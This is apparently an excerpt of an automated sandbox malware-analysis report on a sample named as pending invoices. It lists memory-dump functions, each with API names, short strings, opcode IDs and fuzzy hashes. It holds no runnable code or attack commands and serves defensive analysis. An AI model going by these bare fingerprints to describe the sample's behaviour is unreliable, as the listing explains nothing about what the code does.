                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CallFilterFunc@8
                                • String ID:
                                • API String ID: 4062629308-0
                                • Opcode ID: 4d4343bd92cb3dd4ddb6bd4e569d584ee8c299413d9836b6bfbe8ed3a13593ab
                                • Instruction ID: 9b37485a563c37957ae39e1b2ebd4b3b2fa5cf27dfd8268050c211e74bd19f0a
                                • Opcode Fuzzy Hash: 4d4343bd92cb3dd4ddb6bd4e569d584ee8c299413d9836b6bfbe8ed3a13593ab
                                • Instruction Fuzzy Hash: BEC123B9901B599FDB24CF19C884799FBF1FF98314F5081AED549A7250DB74AA81CF00
                                Function 324E1131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 480a313c979d9b8616e48a4e0867527baf05399696de78dd05b29c9635f13992
                                • Instruction ID: d12f0d6f457bdedd63a4dd9fafc6c08ebde5a867d17a6cdf061bd7031c7059a8
                                • Opcode Fuzzy Hash: 480a313c979d9b8616e48a4e0867527baf05399696de78dd05b29c9635f13992
                                • Instruction Fuzzy Hash: E1B131B56093808FE355CF28C880A1AFBE1BF88704F54496EF999DB352D771E981CB42
                                Function 324E7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c1706ea2643076425c3c79f3afd083826aaad0bf0a796cc72631cc5ff938d44
                                • Instruction ID: 9582bc9cec09ccfa6ef6cd048bec6904240bfa424ec2929414c8533be4a6b461
                                • Opcode Fuzzy Hash: 2c1706ea2643076425c3c79f3afd083826aaad0bf0a796cc72631cc5ff938d44
                                • Instruction Fuzzy Hash: 27A16D75A08341DFE314CF28C580A1ABBE5FF88765F10496DF98697350EB70EA85CB92
                                Function 324E7703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4407303db58b68e8f57a1696915f3491e978ef949b2e922df0bbccd991ce41fc
                                • Instruction ID: 2ba64ca7e7159bae0c9b76d67f6f38ead1348b75318494379d0c9daf797d19e9
                                • Opcode Fuzzy Hash: 4407303db58b68e8f57a1696915f3491e978ef949b2e922df0bbccd991ce41fc
                                • Instruction Fuzzy Hash: F1616375E01606EFEB08CF79C580AADFBB5BF88750F14856ED41AA7340DB70AA45CB90
                                Function 3251F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 494de545f9b673173152af389a10a88473755f2f7d95b3eb4da95fbb4bd4444e
                                • Instruction ID: bec0d7a6b6fee29f898cbdb4c1e1c6a1e9dc7a888837f2bf1e7f04d12b63d029
                                • Opcode Fuzzy Hash: 494de545f9b673173152af389a10a88473755f2f7d95b3eb4da95fbb4bd4444e
                                • Instruction Fuzzy Hash: 21414BB4D01388EFDB10DFA9C480AADBBF4BB48344F50456EE459E7252DB30AA41CF60
                                Function 32591AA3 Relevance: 1.6, Strings: 1, Instructions: 370COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: .
                                • API String ID: 0-248832578
                                • Opcode ID: fa3985c7db64b65dcd3996e6384d022fc9dc6e5e389ca8724620b1359958cb72
                                • Instruction ID: 83f94f8000217117c5a2a49290c894e945ad40227975559375b60e3b9eced848
                                • Opcode Fuzzy Hash: fa3985c7db64b65dcd3996e6384d022fc9dc6e5e389ca8724620b1359958cb72
                                • Instruction Fuzzy Hash: C4E19F79D002698FDB14CFA9C8407EDBBF5FF44B44F90815AE885AB290DB749E82DB50
                                Function 324DB480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 64d8af04f588d31e06806c06d842a624e069304a351c7f99b971e897625d1192
                                • Instruction ID: d39713765edc809e5dd6e6f45a0b130fac2ffdb4f140a6e8d4f7f354c07258b6
                                • Opcode Fuzzy Hash: 64d8af04f588d31e06806c06d842a624e069304a351c7f99b971e897625d1192
                                • Instruction Fuzzy Hash: 3431F172501304AFC711DF14C8A0A5A77A5EF857A8F50466DFD449B392DB72ED82CBD0
                                Function 324E57C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 7d30f022b231732b9eb3eb7b4a00d05b2c2e8d827aa1cf2f24dccb9877aac678
                                • Instruction ID: b9eae3bc1c21cb9787763ce46fb2c5647920225a5b0ceb9869bd9a4cff855932
                                • Opcode Fuzzy Hash: 7d30f022b231732b9eb3eb7b4a00d05b2c2e8d827aa1cf2f24dccb9877aac678
                                • Instruction Fuzzy Hash: 6D318D36615A46FFEB499F24CA40A89FBA6FF84350F505029EC5287B50DB71E931CB80
                                Function 324E3616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: e90de5db20935c2e7e759e66e623cd7a5660b044113e51944002c05c6e74de5a
                                • Instruction ID: f8971f4eb7216a389c438e09d3a4037a60bb19e1638cd00adbaebde51797e4d8
                                • Opcode Fuzzy Hash: e90de5db20935c2e7e759e66e623cd7a5660b044113e51944002c05c6e74de5a
                                • Instruction Fuzzy Hash: A82122B5206650AFF722DF28C944B2ABFA0FF80B55F41646CE8424B740EAB1E945CF81
                                Function 324D92FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: DebugPrintTimes
                                • String ID:
                                • API String ID: 3446177414-0
                                • Opcode ID: 6ed17764eeb2053d90010854b8ceb10d4543f6caacfabc1232dccd439cc58b3a
                                • Instruction ID: c1d6064a2c1ad2bee4d227bef3d4b607a7534f2b79fa934a4db8c3d3be8b3410
                                • Opcode Fuzzy Hash: 6ed17764eeb2053d90010854b8ceb10d4543f6caacfabc1232dccd439cc58b3a
                                • Instruction Fuzzy Hash: 9CF09A32200684ABD7319B59CD08F9ABBEDEF88B50F19051DA94693191DAE1E949C660
                                Function 324E973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction ID: 43fadf38f634b9c6659b7dd42cf85ac4a8cfe7a79d8cca45705aed6be1913b6a
                                • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                • Instruction Fuzzy Hash: EF6198B5D00359AFEF11CFA5C840BDEBBB4FF84715F10416AE861A72A0DB708A41CBA0
                                Function 3256F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: @
                                • API String ID: 0-2766056989
                                • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction ID: 5ee9acf5bfffd6515cd2e54c713968502c25fb36dacd8d4a8ed97ad600b22d30
                                • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                • Instruction Fuzzy Hash: 35519EB2904345BFE7118F64C840F6BBBE8FB84758F401929B991D7290DBB5EE04CB92
                                Function 3259B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: PreferredUILanguages
                                • API String ID: 0-1884656846
                                • Opcode ID: e19ac268f3a8d08391df7c38ea291ecf21b652c8f70c6f94ecf32a2908a701e4
                                • Instruction ID: 61b6db7c99bea7c192084db50bd2db7c8d70c947eac259011880cdbb7c92ff1c
                                • Opcode Fuzzy Hash: e19ac268f3a8d08391df7c38ea291ecf21b652c8f70c6f94ecf32a2908a701e4
                                • Instruction Fuzzy Hash: C241D37AD10219EBEF15CA94C840BEEBBB9EF84754F41456AE911EB250DA70DF40C7A0
                                Function 325697A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: verifier.dll
                                • API String ID: 0-3265496382
                                • Opcode ID: 03867efc21d4668678e650c76355191c7d23be3e0c90877f976dfe3046f8cf4c
                                • Instruction ID: 59d652665af5c096235658ecd6836aa5240112a27e8530e62a79753c3e9171c6
                                • Opcode Fuzzy Hash: 03867efc21d4668678e650c76355191c7d23be3e0c90877f976dfe3046f8cf4c
                                • Instruction Fuzzy Hash: D931B4B5B40301AFD7148F68D850B76BBE5EB98768F90943AE945DF280EB71CE81C790
                                Function 32517505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: #
                                • API String ID: 0-1885708031
                                • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                • Instruction ID: baa25519763b5578e52b5217eda99c255e6763001d2b8c4721b9ca17b7773fde
                                • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                • Instruction Fuzzy Hash: 9941D079A00616EBEF14CF88C890BBEBBB5FF84345F11445AE841A7240DB30EE41CBA1
                                Function 325136EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Flst
                                • API String ID: 0-2374792617
                                • Opcode ID: 31e0fbed1c457e57b8d99a88c03f19fd64ceef06bff8864b0e3155c0e870e8b9
                                • Instruction ID: 12b7d2a22cc78c4324bb7a349acbe37f8bd2db62db5e0eb98868394f49857c77
                                • Opcode Fuzzy Hash: 31e0fbed1c457e57b8d99a88c03f19fd64ceef06bff8864b0e3155c0e870e8b9
                                • Instruction Fuzzy Hash: DC419CB5605301AFE708CF28C490A16FFE4EF99714F50856EE459CF241EB71EA46CB91
                                Function 3251D530 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: g]2
                                • API String ID: 0-2701504074
                                • Opcode ID: 460fe6d04c1f8a2c4a389fc030acb2e94290b0817abcc3b3640f4de58c3b4df0
                                • Instruction ID: 88510b3c3615719e1a776a2f3ddd6f709ec357f9c53a0778671dc37b16f77922
                                • Opcode Fuzzy Hash: 460fe6d04c1f8a2c4a389fc030acb2e94290b0817abcc3b3640f4de58c3b4df0
                                • Instruction Fuzzy Hash: AC2127B2906344ABDB10EF68D940F467BE8AF84754F410C2AF944D7290EB74EF45C7A2
                                Function 324E5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: Actx
                                • API String ID: 0-89312691
                                • Opcode ID: 8bb0339a1ab6391c53cced68c835eac966c86daf0fd196b606ff723eec2209a3
                                • Instruction ID: 569d3816cd8e43342c5874b3671edca456ab45ab50f11613ccef10748187435e
                                • Opcode Fuzzy Hash: 8bb0339a1ab6391c53cced68c835eac966c86daf0fd196b606ff723eec2209a3
                                • Instruction Fuzzy Hash: 1F11B2797097028BFB194B19D850726B795EB9136AF30852AF893CB390DE71DC82CB81
                                Function 3256106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID: LdrCreateEnclave
                                • API String ID: 0-3262589265
                                • Opcode ID: c6bbb7eb618ed07e0e808e3fdd8e095a09d068127a8b08e6fd5efed656d21d8a
                                • Instruction ID: bd81e8f876737edac2d985c4e260e771136532de9aa51939d66d915dc59c8843
                                • Opcode Fuzzy Hash: c6bbb7eb618ed07e0e808e3fdd8e095a09d068127a8b08e6fd5efed656d21d8a
                                • Instruction Fuzzy Hash: ED2102B1919344AFC310CF2AC944A6BFBE8BBD5B54F404A1EF99497350DBB09A05CF92
                                Function 3253739A Relevance: .7, Instructions: 705COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9d2aebf0fd0b019e0ce1f94389b7b3e6c54e1d56a7dc3325069edb4a684f5611
                                • Instruction ID: 7ca82115024c38c9df72b42b9ec6675212a891b74447834202b6dec1dd22f981
                                • Opcode Fuzzy Hash: 9d2aebf0fd0b019e0ce1f94389b7b3e6c54e1d56a7dc3325069edb4a684f5611
                                • Instruction Fuzzy Hash: 9B429E75E016168FDB0ACF58C8907AEBBB2FF88354B54955DDA51AB340DB30EA42CF90
                                Function 325A16CC Relevance: .6, Instructions: 571COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f62eb1c10f4d2a00f97bda15427a00ef939b569e66c6399df76c61e6e374cf2c
                                • Instruction ID: 80e3d32d9da0e1d94cfbadbeeac769444268fff4b5e6c025686264569645dc7f
                                • Opcode Fuzzy Hash: f62eb1c10f4d2a00f97bda15427a00ef939b569e66c6399df76c61e6e374cf2c
                                • Instruction Fuzzy Hash: D722A479A002168FDB0ACF58C4A1AAEBBF2FF88754F54856DD855DB344DB30EA41CB90
                                Function 324ED7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a013855410120e945ed3df7fd3fb978927d7f343dbf2e2b680cf76bbe86b9f10
                                • Instruction ID: 473d02fe7638625c7b30feb2fa230aa85dea191c69cc9793c51445f5185729e8
                                • Opcode Fuzzy Hash: a013855410120e945ed3df7fd3fb978927d7f343dbf2e2b680cf76bbe86b9f10
                                • Instruction Fuzzy Hash: 92C1A275E40315DBFB18CF58C840BAEF7B6BF54755F548269D825BB280DB70AA41CB80
                                Function 324FF460 Relevance: .3, Instructions: 321COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1a269dc7773fb14764d1f7a3bc1bb8e9370b4958f1e3a46d9cc1b64bfd027607
                                • Instruction ID: 348450c65a0229c6eb18f1cc4762a33df7414c647a2baf8335190d059e1bf5bd
                                • Opcode Fuzzy Hash: 1a269dc7773fb14764d1f7a3bc1bb8e9370b4958f1e3a46d9cc1b64bfd027607
                                • Instruction Fuzzy Hash: 61C114B6A023119BEB19CF18C49076977A1FFC4B48F564159ED41AB3E1EF329A82CB50
                                Function 325090DB Relevance: .3, Instructions: 287COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 030814a57a46f741aa0d19fe54d8fdbcb94d35875984d8af07b319991438b6ad
